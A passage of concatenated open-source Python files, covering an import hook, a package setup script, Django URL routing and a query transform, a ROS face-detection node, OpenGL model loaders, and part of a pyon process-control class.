                        to modules that have been imported before
                        it was installed.
    """
    # Idempotent: do nothing if the hook is already installed.
    if RecursiveImporter.is_installed():
        return

    importer = RecursiveImporter()

    # because the hook is a catch-all one, we ensure that it's always
    # at the very end of ``sys.meta_path``, so that it's tried only if
    # no other (more specific) hook has been chosen by Python
    if IS_PY3:
        # Walk backwards to find the last hook NOT provided by the frozen
        # import machinery (builtin hooks report ``_frozen_importlib``).
        # NOTE(review): if sys.meta_path were empty, ``i`` would be unbound
        # below -- presumably never the case on a running interpreter.
        for i in reversed(range(len(sys.meta_path))):
            ih_module = getattr(sys.meta_path[i], '__module__', '')
            is_builtin = ih_module == '_frozen_importlib'
            if not is_builtin:
                break
        # SentinelList keeps the importer pinned at the tail even when other
        # code later appends hooks to sys.meta_path.
        sys.meta_path = SentinelList(
            sys.meta_path[:i],
            sentinels=[importer] + sys.meta_path[i:])
    else:
        sys.meta_path = SentinelList(sys.meta_path, sentinel=importer)

    # look through already imported packages and recursively import
    # their submodules, if they contain the ``__recursive__`` directive
    if retroactive:
        for module in list(sys.modules.values()):
            importer.recurse(module)

# coding: utf-8

# NOTE(review): ``sys`` appears unused in this file -- confirm before removing.
import sys
from setuptools import setup, find_packages

# Distribution name and release version.
NAME = "pollster"
VERSION = "2.0.2"

# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools

# Runtime dependencies (minimum versions as tested).
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil", "pandas >= 0.19.1"]

setup(
    name=NAME,
    version=VERSION,
    description="Pollster API",
    author_email="Adam Hooper <adam.hooper@huffingtonpost.com>",
    url="https://github.com/huffpostdata/python-pollster",
    keywords=["Pollster API"],
    install_requires=REQUIRES,
    packages=find_packages(),
    include_package_data=True,
    long_description="""Download election-related polling data from Pollster."""
)


import requests
import logging
import redis
from requests.packages.urllib3.exceptions import ConnectionError
from core.serialisers import json
from dss import localsettings
# TODO(fergal.moran@gmail.com): refactor these out to
# classes to avoid duplicating constants below
# All realtime-host requests post JSON payloads.
HEADERS = {
    'content-type': 'application/json'
}

# Module logger, shared under the 'spa' namespace.
logger = logging.getLogger('spa')


def post_notification(session_id, image, message):
    """
    Best-effort push of a notification to the realtime host.

    :param session_id: identifier of the target session
    :param image: image reference to attach to the notification
    :param message: notification text
    :return: "" on success, the response body on a non-200 HTTP status,
             or None when the realtime host is unreachable.
    """
    try:
        payload = {
            'sessionid': session_id,
            'image': image,
            'message': message
        }
        data = json.dumps(payload)
        r = requests.post(
            localsettings.REALTIME_HOST + 'notification',
            data=data,
            headers=HEADERS
        )
        if r.status_code == 200:
            return ""
        else:
            return r.text
    except (ConnectionError, requests.exceptions.ConnectionError):
        # The imported ConnectionError is urllib3's; requests wraps transport
        # failures in requests.exceptions.ConnectionError, so catch both.
        # Log the failure instead of silently swallowing it (still
        # best-effort: callers get None rather than an exception).
        # should probably implement some sort of retry in here
        logger.exception("Failed to post notification to realtime host")
        return None
# Copyright (c) 2021, DjaoDjin Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
#    this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
#    this list of conditions and the following disclaimer in the documentation
#    and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

# Package version; the "-dev" suffix marks an unreleased development build.
__version__ = '0.6.4-dev'

# Copyright 2014 Dev in Cachu authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.

from django.conf import settings
from django.conf.urls import include, patterns, url
from django.views.decorators import csrf
from django.views.generic import base

from django.contrib import admin
# Register every installed app's admin.py with the admin site before the
# URL patterns below reference admin.site.urls.
admin.autodiscover()

from devincachu.destaques import views as dviews
from devincachu.inscricao import views as iviews
from devincachu.palestras import views as pviews

# Alias preserved for backwards compatibility with any external references.
p = patterns

# Site URL map: admin, talks/schedule, registration, payment notification,
# certificates, static pages and the landing page.
urlpatterns = patterns(
    "",
    url(r"^admin/", include(admin.site.urls)),
    url(r"^palestrantes/$",
        pviews.PalestrantesView.as_view(),
        name="palestrantes"),
    url(r"^programacao/$",
        pviews.ProgramacaoView.as_view(),
        name="programacao"),
    url(r"^programacao/(?P<palestrantes>.*)/(?P<slug>[\w-]+)/$",
        pviews.PalestraView.as_view(),
        name="palestra"),
    url(r"^inscricao/$",
        iviews.Inscricao.as_view(),
        name="inscricao"),
    # Payment-gateway callback: must be reachable without a CSRF token.
    url(r"^notificacao/$",
        csrf.csrf_exempt(iviews.Notificacao.as_view()),
        name="notificacao"),
    url(r"^certificado/validar/$",
        iviews.ValidacaoCertificado.as_view(),
        name="validacao_certificado"),
    url(r"^certificado/$",
        iviews.BuscarCertificado.as_view(),
        name="busca_certificado"),
    url(r"^certificado/(?P<slug>[0-9a-f]+)/$",
        iviews.Certificado.as_view(),
        name="certificado"),
    url(r"^sobre/$",
        base.TemplateView.as_view(
            template_name="sobre.html",
        ),
        name="sobre-o-evento"),
    url(r"^quando-e-onde/$",
        base.TemplateView.as_view(
            template_name="quando-e-onde.html",
        ),
        name="quando-e-onde"),
    url(r"^$", dviews.IndexView.as_view(), name="index"),
)

# Serve uploaded media through Django only in development.
if settings.DEBUG:
    urlpatterns += patterns(
        "",
        url(r"^media/(?P<path>.*)$",
            "django.views.static.serve",
            {"document_root": settings.MEDIA_ROOT}),
    )

#!/usr/bin/env python
#*********************************************************************
# Software License Agreement (BSD License)
#
#  Copyright (c) 2011 andrewtron3000
#  All rights reserved.
#
#  Redistribution and use in source and binary forms, with or without
#  modification, are permitted provided that the following conditions
#  are met:
#
#   * Redistributions of source code must retain the above copyright
#     notice, this list of conditions and the following disclaimer.
#   * Redistributions in binary form must reproduce the above
#     copyright notice, this list of conditions and the following
#     disclaimer in the documentation and/or other materials provided
#     with the distribution.
#   * Neither the name of the Willow Garage nor the names of its
#     contributors may be used to endorse or promote products derived
#     from this software without specific prior written permission.
#
#  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
#  "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
#  FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
#  COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
#  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
#  BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
#  LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
#  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
#  LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
#  ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#  POSSIBILITY OF SUCH DAMAGE.
#********************************************************************/
import roslib; roslib.load_manifest('face_detection')
import rospy
import sys
import cv
from cv_bridge import CvBridge

from sensor_msgs.msg import Image
from geometry_msgs.msg import Point
from geometry_msgs.msg import PointStamped

#
#  Instantiate a new opencv to ROS bridge adaptor
#
# Shared by callback() to convert ROS Image messages to OpenCV images
# and back again.
cv_bridge = CvBridge()

#
# Define the callback that will be called when a new image is received.
#
def callback(publisher, coord_publisher, cascade, imagemsg):
    """Process one incoming frame: detect faces, box them, republish.

    publisher       -- Publisher for the annotated output Image
    coord_publisher -- Publisher for the PointStamped face centroid
    cascade         -- Haar classifier previously loaded with cv.Load
    imagemsg        -- incoming sensor_msgs/Image message
    """
    #
    #  Convert the ROS imagemsg to an opencv image.
    #  ('mono8' = single-channel 8-bit greyscale encoding)
    #
    image = cv_bridge.imgmsg_to_cv(imagemsg, 'mono8')

    #
    #  Blur the image.
    #
    cv.Smooth(image, image, cv.CV_GAUSSIAN)

    #
    #  Allocate some storage for the haar detect operation.
    #
    storage = cv.CreateMemStorage(0)

    #
    #  Call the face detector function.
    #  (scale factor 1.2, min neighbors 2, min face size 100x100 px)
    #
    faces = cv.HaarDetectObjects(image, cascade, storage, 1.2, 2, 
                                 cv.CV_HAAR_DO_CANNY_PRUNING, (100,100))
 
    #
    #  If faces are detected, compute the centroid of all the faces
    #  combined.
    #
    face_centroid_x = 0.0
    face_centroid_y = 0.0
    if len(faces) > 0:
        #
        #  For each face, draw a rectangle around it in the image,
        #  and also add the position of the face to the centroid
        #  of all faces combined.
        #
        for (i, n) in faces:
            # i is the (x, y, w, h) bounding rect; n is the neighbor count.
            x = int(i[0])
            y = int(i[1])
            width = int(i[2])
            height = int(i[3])
            cv.Rectangle(image, 
                         (x, y),
                         (x + width, y + height),
                         cv.CV_RGB(0,255,0), 3, 8, 0)
            # Accumulate each face's center; averaged below.
            face_centroid_x += float(x) + (float(width) / 2.0)
            face_centroid_y += float(y) + (float(height) / 2.0)
        #
        #  Finish computing the face_centroid by dividing by the
        #  number of faces found above.
        #
        face_centroid_x /= float(len(faces))
        face_centroid_y /= float(len(faces))
        #
        #  Lastly, if faces were detected, publish a PointStamped 
        #  message that contains the centroid values.
        #
        pt = Point(x = face_centroid_x, y = face_centroid_y, z = 0.0)
        pt_stamped = PointStamped(point = pt)
        coord_publisher.publish(pt_stamped)

    #
    #  Convert the opencv image back to a ROS image using the 
    #  cv_bridge.
    #
    newmsg = cv_bridge.cv_to_imgmsg(image, 'mono8')

    #
    #  Republish the image.  Note this image has boxes around 
    #  faces if faces were found.
    #
    publisher.publish(newmsg)

def listener(publisher, coord_publisher):
    """Initialize the ROS node, subscribe to the camera stream, and spin.

    publisher       -- Publisher for the annotated image stream
    coord_publisher -- Publisher for face centroid coordinates
    """
    rospy.init_node('face_detector', anonymous=True)
    #
    #  Load the haar cascade.  Note we get the 
    #  filename from the "classifier" parameter
    #  that is configured in the launch script.
    #
    cascadeFileName = rospy.get_param("~classifier")
    cascade = cv.Load(cascadeFileName)
    # The lambda binds the publishers and cascade so callback() receives
    # only the incoming image message from the subscription.
    rospy.Subscriber("/stereo/left/image_rect", 
                     Image, 
                     lambda image: callback(publisher, coord_publisher, cascade, image))
    rospy.spin()

# This is called first.
if __name__ == '__main__':
    # Create the publishers before the node spins so callback() can use them.
    publisher = rospy.Publisher('face_view', Image)
    coord_publisher = rospy.Publisher('face_coords', PointStamped)
    listener(publisher, coord_publisher)

#! /usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import os
import urllib

from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *

from jp.ac.kyoto_su.aokilab.dragon.mvc.model import OpenGLModel
from jp.ac.kyoto_su.aokilab.dragon.mvc.view import *
from jp.ac.kyoto_su.aokilab.dragon.opengl.triangle import OpenGLTriangle
from jp.ac.kyoto_su.aokilab.dragon.opengl.polygon import OpenGLPolygon

TRACE = True   # when True, each method prints its name and docstring on entry
DEBUG = False  # debug flag; unused in this chunk -- confirm at other call sites

class DragonModel(OpenGLModel):
	"""Dragon model."""

	def __init__(self):
		"""Construct the dragon model: set the camera, fetch the data
		file if it is not cached locally, and parse it into triangles."""
		# BUG FIX: was ``print(__name__), self.__init__.__doc__`` -- the
		# trailing tuple expression silently discarded the docstring.
		if TRACE: print(__name__, self.__init__.__doc__)

		super(DragonModel, self).__init__()
		# Camera parameters tuned for this particular model.
		self._eye_point = [-5.5852450791872 , 3.07847342734 , 15.794105252496]
		self._sight_point = [0.27455347776413 , 0.20096999406815 , -0.11261999607086]
		self._up_vector = [0.1018574904194 , 0.98480906061847 , -0.14062775604137]
		self._fovy = self._default_fovy = 12.642721790235

		# Download the model data on first use; afterwards reuse the copy
		# cached in the current working directory.
		filename = os.path.join(os.getcwd(), 'dragon.txt')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Dragon/dragon.txt'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break  # EOF
				a_list = a_string.split()
				if len(a_list) == 0: continue  # skip blank lines
				first_string = a_list[0]
				if first_string == "number_of_vertexes":
					number_of_vertexes = int(a_list[1])
				if first_string == "number_of_triangles":
					number_of_triangles = int(a_list[1])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					# Vertex table; indices in the file are 1-based.
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index-1])
					# Triangle list: three vertex indices per line.
					for n_th in range(number_of_triangles):
						a_list = get_tokens(a_file)
						indexes = map(int, a_list[0:3])
						vertexes = map(index_to_vertex, indexes)
						a_tringle = OpenGLTriangle(*vertexes)
						self._display_object.append(a_tringle)

		return

	def default_window_title(self):
		"""Return the window title (label) for the dragon model."""
		if TRACE: print(__name__, self.default_window_title.__doc__)

		return "Dragon"


class WaspModel(OpenGLModel):
	"""Wasp (hornet) model."""

	def __init__(self):
		"""Construct the wasp model: set the camera, fetch the data file
		if it is not cached locally, and parse it into colored polygons."""
		# BUG FIX: was ``print(__name__), self.__init__.__doc__`` -- the
		# trailing tuple expression silently discarded the docstring.
		if TRACE: print(__name__, self.__init__.__doc__)

		super(WaspModel, self).__init__()
		# Camera parameters tuned for this particular model.
		self._eye_point = [-5.5852450791872 , 3.07847342734 , 15.794105252496]
		self._sight_point = [0.19825005531311 , 1.8530999422073 , -0.63795006275177]
		self._up_vector = [0.070077999093727 , 0.99630606032682 , -0.049631725731267]
		self._fovy = self._default_fovy = 41.480099231656

		# Download the model data on first use; afterwards reuse the copy
		# cached in the current working directory.
		filename = os.path.join(os.getcwd(), 'wasp.txt')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Wasp/wasp.txt'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break  # EOF
				a_list = a_string.split()
				if len(a_list) == 0: continue  # skip blank lines
				first_string = a_list[0]
				if first_string == "number_of_vertexes":
					number_of_vertexes = int(a_list[1])
				if first_string == "number_of_polygons":
					number_of_polygons = int(a_list[1])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					# Vertex table; indices in the file are 1-based.
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index-1])
					# Polygon lines: <count> <count indexes...> <r> <g> <b>
					for n_th in range(number_of_polygons):
						a_list = get_tokens(a_file)
						number_of_indexes = int(a_list[0])
						index = number_of_indexes + 1
						indexes = map(int, a_list[1:index])
						vertexes = map(index_to_vertex, indexes)
						rgb_color = map(float, a_list[index:index+3])
						a_polygon = OpenGLPolygon(vertexes, rgb_color)
						self._display_object.append(a_polygon)

		return

	def default_view_class(self):
		"""Return the default view class used to display the wasp model."""
		if TRACE: print(__name__, self.default_view_class.__doc__)

		return WaspView

	def default_window_title(self):
		"""Return the window title (label) for the wasp model."""
		if TRACE: print(__name__, self.default_window_title.__doc__)

		return "Wasp"


class BunnyModel(OpenGLModel):
	"""Stanford bunny model."""

	def __init__(self):
		"""Construct the bunny model: fetch the PLY data file if it is
		not cached locally and parse it into triangles, reading the
		camera parameters from the PLY comment lines."""
		# BUG FIX: was ``print(__name__), self.__init__.__doc__`` -- the
		# trailing tuple expression silently discarded the docstring.
		if TRACE: print(__name__, self.__init__.__doc__)

		super(BunnyModel, self).__init__()

		# Download the model data on first use; afterwards reuse the copy
		# cached in the current working directory.
		filename = os.path.join(os.getcwd(), 'bunny.ply')
		if os.path.exists(filename) and os.path.isfile(filename):
			pass
		else:
			url = 'http://www.cc.kyoto-su.ac.jp/~atsushi/Programs/Bunny/bunny.ply'
			urllib.urlretrieve(url, filename)

		with open(filename, "rU") as a_file:
			while True:
				a_string = a_file.readline()
				if len(a_string) == 0: break  # EOF
				a_list = a_string.split()
				if len(a_list) == 0: continue  # skip blank lines
				first_string = a_list[0]
				# PLY header: element counts for vertexes and faces.
				if first_string == "element":
					second_string = a_list[1]
					if second_string == "vertex":
						number_of_vertexes = int(a_list[2])
					if second_string == "face":
						number_of_faces = int(a_list[2])
				if first_string == "end_header":
					get_tokens = (lambda file: file.readline().split())
					# Vertex table; PLY face indices are 0-based.
					collection_of_vertexes = []
					for n_th in range(number_of_vertexes):
						a_list = get_tokens(a_file)
						a_vertex = map(float, a_list[0:3])
						collection_of_vertexes.append(a_vertex)
					index_to_vertex = (lambda index: collection_of_vertexes[index])
					# Face lines: <count> <i0> <i1> <i2> (triangles assumed).
					for n_th in range(number_of_faces):
						a_list = get_tokens(a_file)
						indexes = map(int, a_list[1:4])
						vertexes = map(index_to_vertex, indexes)
						a_tringle = OpenGLTriangle(*vertexes)
						self._display_object.append(a_tringle)
				# Camera parameters are embedded in PLY "comment" lines,
				# e.g. "comment eye_point_xyz <x> <y> <z>".
				if first_string == "comment":
					second_string = a_list[1]
					if second_string == "eye_point_xyz":
						self._eye_point = map(float, a_list[2:5])
					if second_string == "sight_point_xyz":
						self._sight_point = map(float, a_list[2:5])
					if second_string == "up_vector_xyz":
						self._up_vector = map(float, a_list[2:5])
					# Expected shape: "comment zoom_height <h> fovy <f>".
					if second_string == "zoom_height" and a_list[3] == "fovy":
						self._fovy = self._default_fovy = float(a_list[4])

		return

	def default_view_class(self):
		"""Return the default view class used to display the bunny model."""
		if TRACE: print(__name__, self.default_view_class.__doc__)

		return BunnyView

	def default_window_title(self):
		"""Return the window title (label) for the bunny model."""
		if TRACE: print(__name__, self.default_window_title.__doc__)

		return "Stanford Bunny"

# end of file
# Copyright 2015-2017 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)

from lino.core.roles import UserRole


class SimpleContactsUser(UserRole):
    """Marker role; defines no behavior of its own."""
    pass
    
class ContactsUser(SimpleContactsUser):
    """Marker role extending SimpleContactsUser; adds no behavior."""
    pass


class ContactsStaff(ContactsUser):
    """Marker role extending ContactsUser; adds no behavior."""
    pass


from django.db.models import Transform
from django.db.models import DateTimeField, TimeField
from django.utils.functional import cached_property


class TimeValue(Transform):
    """Transform exposing the time-of-day of a datetime expression via SQL TIME()."""
    # Lookup name: enables ``somefield__time`` in querysets.
    lookup_name = 'time'
    # NOTE(review): ``function`` is unused because as_sql() below builds the
    # SQL by hand -- confirm whether it can be removed.
    function = 'time'

    def as_sql(self, compiler, connection):
        # Compile the wrapped expression and wrap it in TIME(...).
        lhs, params = compiler.compile(self.lhs)
        return 'TIME({})'.format(lhs), params

    @cached_property
    def output_field(self):
        # The transform always yields a time value.
        return TimeField()


# Make the transform available on every DateTimeField as ``__time``.
DateTimeField.register_lookup(TimeValue)
#!/usr/bin/env python

# Module authorship metadata.
__author__ = 'Adam R. Smith, Michael Meisinger, Dave Foster <dfoster@asascience.com>'

import threading
import traceback
import gevent
from gevent import greenlet, Timeout
from gevent.event import Event, AsyncResult
from gevent.queue import Queue

from pyon.core import MSG_HEADER_ACTOR
from pyon.core.bootstrap import CFG
from pyon.core.exception import IonException, ContainerError
from pyon.core.exception import Timeout as IonTimeout
from pyon.core.thread import PyonThreadManager, PyonThread, ThreadManager, PyonThreadTraceback, PyonHeartbeatError
from pyon.datastore.postgresql.pg_util import init_db_stats, get_db_stats, clear_db_stats
from pyon.ion.service import BaseService
from pyon.util.containers import get_ion_ts, get_ion_ts_millis
from pyon.util.log import log

STAT_INTERVAL_LENGTH = 60000  # Interval time for process saturation stats collection

# Module-level stats hook; None disables it. Presumably set by external code
# to receive process stats -- confirm at call sites outside this chunk.
stats_callback = None


class OperationInterruptedException(BaseException):
    """
    Interrupted exception. Used by external items timing out execution in the
    IonProcessThread's control thread.

    Derived from BaseException to specifically avoid try/except Exception blocks,
    such as in Publisher's publish_event.
    """
    # Intentionally empty: the exception type itself carries the signal.
    pass


class IonProcessError(StandardError):
    # Raised for misuse of an IonProcessThread (e.g. removing an unknown
    # listener). NOTE: StandardError exists only on Python 2.
    pass


class IonProcessThread(PyonThread):
    """
    The control part of an ION process.
    """

    def __init__(self, target=None, listeners=None, name=None, service=None, cleanup_method=None,
                 heartbeat_secs=10, **kwargs):
        """
        Constructs the control part of an ION process.
        Used by the container's IonProcessThreadManager, as part of spawn_process.

        @param  target          A callable to run in the PyonThread. If None (typical), will use the target method
                                defined in this class.
        @param  listeners       A list of listening endpoints attached to this thread.
        @param  name            The name of this ION process.
        @param  service         An instance of the BaseService derived class which contains the business logic for
                                the ION process.
        @param  cleanup_method  An optional callable to run when the process is stopping. Runs after all other
                                notify_stop calls have run. Should take one param, this instance.
        @param  heartbeat_secs  Number of seconds to wait in between heartbeats.
        """
        # Listeners added before the process starts are held here and
        # attached when the process spawns (see add_endpoint).
        self._startup_listeners = listeners or []
        self.listeners          = []
        self._listener_map      = {}
        self.name               = name
        self.service            = service
        self._cleanup_method    = cleanup_method

        self.thread_manager     = ThreadManager(failure_notify_callback=self._child_failed)  # bubbles up to main thread manager
        self._dead_children     = []        # save any dead children for forensics
        self._ctrl_thread       = None
        self._ctrl_queue        = Queue()
        self._ready_control     = Event()
        self._errors            = []
        self._ctrl_current      = None      # set to the AR generated by _routing_call when in the context of a call

        # processing vs idle time (ms)
        self._start_time        = None
        self._proc_time         = 0   # busy time since start
        self._proc_time_prior   = 0   # busy time at the beginning of the prior interval
        self._proc_time_prior2  = 0   # busy time at the beginning of 2 interval's ago
        self._proc_interval_num = 0   # interval num of last record

        # for heartbeats, used to detect stuck processes
        self._heartbeat_secs    = heartbeat_secs    # amount of time to wait between heartbeats
        self._heartbeat_stack   = None              # stacktrace of last heartbeat
        self._heartbeat_time    = None              # timestamp of heart beat last matching the current op
        self._heartbeat_op      = None              # last operation (by AR)
        self._heartbeat_count   = 0                 # number of times this operation has been seen consecutively

        # Diagnostics toggles read from container configuration.
        self._log_call_exception = CFG.get_safe("container.process.log_exceptions", False)
        self._log_call_dbstats = CFG.get_safe("container.process.log_dbstats", False)
        self._warn_call_dbstmt_threshold = CFG.get_safe("container.process.warn_dbstmt_threshold", 0)

        PyonThread.__init__(self, target=target, **kwargs)

    def heartbeat(self):
        """
        Returns a 3-tuple indicating everything is ok.

        Should only be called after the process has been started.
        Checks the following:
            - All attached endpoints are alive + listening (this means ready)
            - The control flow greenlet is alive + listening or processing

        @return 3-tuple indicating (listeners ok, ctrl thread ok, heartbeat status). Use all on it for a
                boolean indication of success.
        """
        # A listener is healthy only if it is in the listener map, its
        # greenlet is alive, and it has signaled readiness.
        listeners_ok = True
        for l in self.listeners:
            if not (l in self._listener_map and not self._listener_map[l].proc.dead and l.get_ready_event().is_set()):
                listeners_ok = False

        ctrl_thread_ok = self._ctrl_thread.running

        # are we currently processing something?
        heartbeat_ok = True
        if self._ctrl_current is not None:
            # Snapshot the control greenlet's stack; identical successive
            # snapshots for the same operation indicate it may be stuck.
            st = traceback.extract_stack(self._ctrl_thread.proc.gr_frame)

            if self._ctrl_current == self._heartbeat_op:

                if st == self._heartbeat_stack:
                    self._heartbeat_count += 1  # we've seen this before! increment count

                    # we've been in this for the last X ticks, or it's been X seconds, fail this part of the heartbeat
                    if self._heartbeat_count > CFG.get_safe('container.timeout.heartbeat_proc_count_threshold', 30) or \
                       get_ion_ts_millis() - int(self._heartbeat_time) >= CFG.get_safe('container.timeout.heartbeat_proc_time_threshold', 30) * 1000:
                        heartbeat_ok = False
                else:
                    # it's made some progress
                    self._heartbeat_count = 1
                    self._heartbeat_stack = st
                    self._heartbeat_time  = get_ion_ts()
            else:
                # A different operation since last heartbeat: restart tracking.
                self._heartbeat_op      = self._ctrl_current
                self._heartbeat_count   = 1
                self._heartbeat_time    = get_ion_ts()
                self._heartbeat_stack   = st

        else:
            # Idle: nothing in flight, clear the stuck-operation tracking.
            self._heartbeat_op      = None
            self._heartbeat_count   = 0

        #log.debug("%s %s %s", listeners_ok, ctrl_thread_ok, heartbeat_ok)
        return (listeners_ok, ctrl_thread_ok, heartbeat_ok)

    @property
    def time_stats(self):
        """
        Returns a 5-tuple of (total time, idle time, processing time, time since prior interval start,
        busy since prior interval start), all in ms (int).
        """
        current_ms = get_ion_ts_millis()
        total_ms = current_ms - self._start_time
        idle_ms = total_ms - self._proc_time

        # Which stats interval we are in now, and how long ago the prior
        # interval started.
        interval_num = current_ms / STAT_INTERVAL_LENGTH
        since_prior_ms = current_ms - (interval_num - 1) * STAT_INTERVAL_LENGTH

        if interval_num == self._proc_interval_num:
            busy_since_prior = self._proc_time - self._proc_time_prior2
        elif interval_num - 1 == self._proc_interval_num:
            busy_since_prior = self._proc_time - self._proc_time_prior
        else:
            # No busy time recorded within the prior interval window.
            busy_since_prior = 0

        return (total_ms, idle_ms, self._proc_time, since_prior_ms, busy_since_prior)

    def _child_failed(self, child):
        """
        Callback from gevent as set in the ThreadManager, when a child greenlet fails.
        Kills the ION process main greenlet. This propagates the error up to the process supervisor.

        @param child  The failed greenlet (compared against each managed
                      thread's ``proc``); its ``exception`` is re-raised in
                      this process's main greenlet via kill().
        """
        # remove the child from the list of children (so we can shut down cleanly)
        for x in self.thread_manager.children:
            if x.proc == child:
                self.thread_manager.children.remove(x)
                break
        self._dead_children.append(child)

        # kill this process's main greenlet. This should be noticed by the container's proc manager
        self.proc.kill(child.exception)

    def add_endpoint(self, listener, activate=True):
        """
        Adds a listening endpoint to be managed by this ION process.

        Spawns the listen loop and sets the routing call to synchronize incoming messages
        here. If this process hasn't been started yet, adds it to the list of listeners
        to start on startup.
        @param activate  If True (default), start consuming from listener
        """
        if self.proc:
            # All messages received by this listener are serialized through
            # this process's control queue (see _routing_call).
            listener.routing_call = self._routing_call

            # Build a descriptive greenlet name for debugging/forensics.
            if self.name:
                svc_name = "unnamed-service"
                if self.service is not None and hasattr(self.service, 'name'):
                    svc_name = self.service.name

                listen_thread_name = "%s-%s-listen-%s" % (svc_name, self.name, len(self.listeners)+1)
            else:
                listen_thread_name = "unknown-listener-%s" % (len(self.listeners)+1)

            listen_thread = self.thread_manager.spawn(listener.listen, thread_name=listen_thread_name, activate=activate)
            listen_thread.proc._glname = "ION Proc listener %s" % listen_thread_name
            self._listener_map[listener] = listen_thread
            self.listeners.append(listener)
        else:
            # Process not spawned yet: defer attachment until startup.
            self._startup_listeners.append(listener)

    def remove_endpoint(self, listener):
        """
        Removes a listening endpoint from management by this ION process.

        If the endpoint is unknown to this ION process, raises an error.

        @return The PyonThread running the listen loop, if it exists. You are
                responsible for closing it when appropriate.
        """
        # Active listener: detach it and hand back its listen-loop thread.
        if listener in self.listeners:
            self.listeners.remove(listener)
            return self._listener_map.pop(listener)

        # Listener queued for startup but never spawned: nothing to return.
        if listener in self._startup_listeners:
            self._startup_listeners.remove(listener)
            return None

        raise IonProcessError("Cannot remove unrecognized listener: %s" % listener)

    def target(self, *args, **kwargs):
        """
        Entry point for the main process greenlet.
        Setup the base properties for this process (mainly the control thread).
        """
        if self.name:
            threading.current_thread().name = "%s-target" % self.name

        # start time (ms); interval number uses integer division on Python 2
        self._start_time = get_ion_ts_millis()
        self._proc_interval_num = self._start_time / STAT_INTERVAL_LENGTH

        # spawn control flow loop
        self._ctrl_thread = self.thread_manager.spawn(self._control_flow)
        self._ctrl_thread.proc._glname = "ION Proc CL %s" % self.name

        # wait on control flow loop, heartbeating as appropriate
        while not self._ctrl_thread.ev_exit.wait(timeout=self._heartbeat_secs):
            hbst = self.heartbeat()

            if not all(hbst):
                log.warn("Heartbeat status for process %s returned %s", self, hbst)
                # Include the last sampled stack of the control greenlet, if
                # any, to aid diagnosing a stuck operation.
                if self._heartbeat_stack is not None:
                    stack_out = "".join(traceback.format_list(self._heartbeat_stack))
                else:
                    stack_out = "N/A"

                #raise PyonHeartbeatError("Heartbeat failed: %s, stacktrace:\n%s" % (hbst, stack_out))
                log.warn("Heartbeat failed: %s, stacktrace:\n%s", hbst, stack_out)

        # this is almost a no-op as we don't fall out of the above loop without
        # exiting the ctrl_thread, but having this line here makes testing much easier.
        self._ctrl_thread.join()

    def _routing_call(self, call, context, *callargs, **callkwargs):
        """
        Endpoints call into here to synchronize across the entire IonProcess.

        Returns immediately with an AsyncResult that can be waited on. Calls
        are made by the loop in _control_flow. We pass in the calling greenlet so
